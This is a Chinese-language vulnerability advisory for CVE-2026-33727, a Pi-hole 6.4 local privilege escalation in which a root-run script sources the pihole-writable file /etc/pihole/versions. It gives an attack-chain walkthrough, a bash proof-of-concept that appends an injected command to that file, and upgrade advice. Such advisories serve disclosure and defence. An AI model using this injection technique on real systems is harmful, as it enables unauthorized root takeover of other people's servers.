CVE-2026-33727 CVSS 6.4 中危

CVE-2026-33727 Pi-hole 本地权限提升漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33727

漏洞类型

本地权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Pi-hole

漏洞概述

Pi-hole是Linux网络级广告拦截应用。其6.4版本存在本地权限提升漏洞，允许低权限的pihole账户提权至root。尽管pihole账户使用nologin，但在组件被攻陷后，攻击者可控制/etc/pihole/versions文件。由于root运行的脚本会加载该文件，导致攻击者控制的代码以root身份执行。该漏洞已在6.4.1版本修复。

技术细节

该漏洞属于典型的本地权限提升（LPE）漏洞。其核心原理在于Pi-hole的root权限管理脚本不当引用了低权限用户可写的配置文件。在Pi-hole 6.4版本中，`/etc/pihole/versions` 文件可以被低权限的`pihole`用户账户修改。尽管该账户默认配置了`nologin` shell，防止了直接的SSH或终端登录，但这并不阻止通过Web服务或其他已攻陷的组件以`pihole` UID执行代码。一旦攻击者以`pihole`身份运行，即可向`/etc/pihole/versions`写入恶意Shell脚本。由于系统的维护脚本（如更新检查）由root用户运行，且在执行过程中会source该文件，导致其中的恶意命令被root身份解析执行，从而造成系统完全被控。

攻击链分析

STEP 1

1. 初始访问

攻击者通过其他漏洞（如Web应用漏洞）获得低权限的pihole用户访问权限。

STEP 2

2. 写入恶意配置

攻击者利用pihole用户权限，修改/etc/pihole/versions文件，植入恶意Shell命令。

STEP 3

3. 触发脚本执行

系统管理员或定时任务触发由root权限运行的Pi-hole维护脚本。

STEP 4

4. 权限提升

Root脚本执行时source了被篡改的/etc/pihole/versions文件，导致恶意代码以root身份执行。

STEP 5

5. 系统控制

攻击者成功获得Root权限，完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-33727: Pi-hole Local Privilege Escalation
# Description: Inject malicious code into /etc/pihole/versions to achieve root RCE.
# Context: Run this as the 'pihole' user (e.g., via a web vulnerability).

TARGET_FILE="/etc/pihole/versions"

# Check if we can write to the target
if [ -w "$TARGET_FILE" ]; then
    echo "[+] Target file is writable. Injecting payload..."

    # Create a payload that creates a root-owned file as proof of concept
    # The payload will be sourced by a root-run script.
    PAYLOAD='echo "CVE-2026-33727 POC: $(whoami)" > /tmp/pwned_by_cve_2026_33727.txt'

    # Append payload to the versions file
    # Note: The actual exploitation depends on how the script sources the file.
    # This assumes the file is executed or sourced directly.
    echo "$PAYLOAD" >> "$TARGET_FILE"

    echo "[+] Payload injected. Wait for a cron job or admin action to trigger the root script."
    echo "[+] Check /tmp/pwned_by_cve_2026_33727.txt for root access."
else
    echo "[-] Error: Cannot write to $TARGET_FILE. Exploit failed."
fi

影响范围

Pi-hole 6.4

Pi-hole < 6.4.1

防御指南

临时缓解措施

建议立即将Pi-hole升级至6.4.1或更高版本以修复此漏洞。如果无法立即升级，应严格限制对pihole账户的访问权限，并检查/etc/pihole/versions目录的完整性，防止非授权写入。同时，监控系统中异常的root进程启动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表